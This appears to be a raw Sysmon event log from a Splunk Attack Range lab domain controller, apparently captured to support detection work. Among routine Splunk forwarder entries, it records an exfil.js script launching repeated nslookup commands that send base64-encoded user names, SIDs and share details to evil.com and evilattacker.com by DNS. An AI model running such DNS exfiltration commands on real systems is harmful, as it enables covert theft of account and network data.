AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000074755Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:32:16.903{A8622C2F-5C80-6078-A60F-00000000AE01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000074746Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:32:16.236{A8622C2F-5C80-6078-A50F-00000000AE01}5108C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000074710Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:32:07.579{A8622C2F-5C77-6078-A40F-00000000AE01}6516C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXEd1ZXN0 evil.com C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5C77-6078-A20F-00000000AE01}6672C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXEd1ZXN0 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlldw.tmp 2>&1 154100x800000000000000074699Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:32:07.550{A8622C2F-5C77-6078-A20F-00000000AE01}6672C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXEd1ZXN0 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlldw.tmp 2>&1C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58B2-6078-F10D-00000000AE01}2576C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\temp\exfil.js" 154100x800000000000000074652Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:31:55.135{A8622C2F-5C6B-6078-A10F-00000000AE01}6084C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5C6B-6078-9F0F-00000000AE01}5864C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nldmz.tmp 2>&1 154100x800000000000000074641Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:31:55.106{A8622C2F-5C6B-6078-9F0F-00000000AE01}5864C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nldmz.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58C3-6078-FC0D-00000000AE01}4860C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 154100x800000000000000074571Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:31:37.488{A8622C2F-5C59-6078-9E0F-00000000AE01}5368C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5C59-6078-9C0F-00000000AE01}4376C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nldnwuq.tmp 2>&1 154100x800000000000000074560Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:31:37.458{A8622C2F-5C59-6078-9C0F-00000000AE01}4376C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nldnwuq.tmp 2>&1C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58B2-6078-F10D-00000000AE01}2576C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\temp\exfil.js" 154100x800000000000000074513Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:31:25.047{A8622C2F-5C4D-6078-9B0F-00000000AE01}3904C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IEFkbWluaXN0cmF0b3I= evil.com C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5C4D-6078-990F-00000000AE01}5084C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IEFkbWluaXN0cmF0b3I= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nldcrgot.tmp 2>&1 154100x800000000000000074502Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:31:25.018{A8622C2F-5C4D-6078-990F-00000000AE01}5084C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IEFkbWluaXN0cmF0b3I= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nldcrgot.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58C3-6078-FC0D-00000000AE01}4860C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 154100x800000000000000074485Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:31:22.144{A8622C2F-5C4A-6078-980F-00000000AE01}7036C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000074470Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:31:20.658{A8622C2F-5C48-6078-970F-00000000AE01}5800C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000074458Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:31:19.992{A8622C2F-5C47-6078-960F-00000000AE01}6108C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000074448Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:31:19.312{A8622C2F-5C47-6078-950F-00000000AE01}7140C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000074432Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:31:17.462{A8622C2F-5C45-6078-940F-00000000AE01}6084C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000074423Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:31:16.780{A8622C2F-5C44-6078-930F-00000000AE01}4640C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000074414Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:31:16.221{A8622C2F-5C44-6078-920F-00000000AE01}5664C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000074349Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:31:07.418{A8622C2F-5C3B-6078-910F-00000000AE01}4140C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IEFkbWluaXN0cmF0b3I= evil.com C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5C3B-6078-8F0F-00000000AE01}4160C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IEFkbWluaXN0cmF0b3I= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nleubp.tmp 2>&1 154100x800000000000000074338Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:31:07.388{A8622C2F-5C3B-6078-8F0F-00000000AE01}4160C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IEFkbWluaXN0cmF0b3I= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nleubp.tmp 2>&1C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58B2-6078-F10D-00000000AE01}2576C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\temp\exfil.js" 154100x800000000000000074285Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:30:54.945{A8622C2F-5C2E-6078-8E0F-00000000AE01}4732C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5C2E-6078-8C0F-00000000AE01}4244C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlcunnu.tmp 2>&1 154100x800000000000000074274Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:30:54.915{A8622C2F-5C2E-6078-8C0F-00000000AE01}4244C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlcunnu.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58C3-6078-FC0D-00000000AE01}4860C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 154100x800000000000000074197Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:30:39.907{A8622C2F-5C1F-6078-8B0F-00000000AE01}7044C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtNjgwNTA3MDA3LTc4NTUwMjQ0Ni0yMDA1Mjg4MzQyLTUwMA== evil.com C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5C1F-6078-890F-00000000AE01}5316C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtNjgwNTA3MDA3LTc4NTUwMjQ0Ni0yMDA1Mjg4MzQyLTUwMA== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlyns.tmp 2>&1 154100x800000000000000074184Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:30:39.878{A8622C2F-5C1F-6078-890F-00000000AE01}5316C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtNjgwNTA3MDA3LTc4NTUwMjQ0Ni0yMDA1Mjg4MzQyLTUwMA== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlyns.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58C3-6078-FC0D-00000000AE01}4860C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 154100x800000000000000074175Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:30:39.599{A8622C2F-5C1F-6078-880F-00000000AE01}6108C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBEZWZhdWx0IHNoYXJl evil.com C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5C1F-6078-860F-00000000AE01}4152C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBEZWZhdWx0IHNoYXJl evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nltyqyzy.tmp 2>&1 154100x800000000000000074164Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:30:39.568{A8622C2F-5C1F-6078-860F-00000000AE01}4152C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBEZWZhdWx0IHNoYXJl evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nltyqyzy.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58DF-6078-060E-00000000AE01}2824C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 154100x800000000000000074144Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:30:38.901{A8622C2F-5C1E-6078-850F-00000000AE01}636C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBSZW1vdGUgQWRtaW4= evilattacker.com C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5C1E-6078-830F-00000000AE01}2584C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBSZW1vdGUgQWRtaW4= evilattacker.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlzzalt.tmp 2>&1 154100x800000000000000074133Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:30:38.870{A8622C2F-5C1E-6078-830F-00000000AE01}2584C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBSZW1vdGUgQWRtaW4= evilattacker.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlzzalt.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-5932-6078-370E-00000000AE01}184C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 154100x800000000000000074114Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:30:37.334{A8622C2F-5C1D-6078-820F-00000000AE01}4808C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5C1D-6078-800F-00000000AE01}5868C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlcspvihl.tmp 2>&1 154100x800000000000000074103Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:30:37.305{A8622C2F-5C1D-6078-800F-00000000AE01}5868C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlcspvihl.tmp 2>&1C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58B2-6078-F10D-00000000AE01}2576C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\temp\exfil.js" 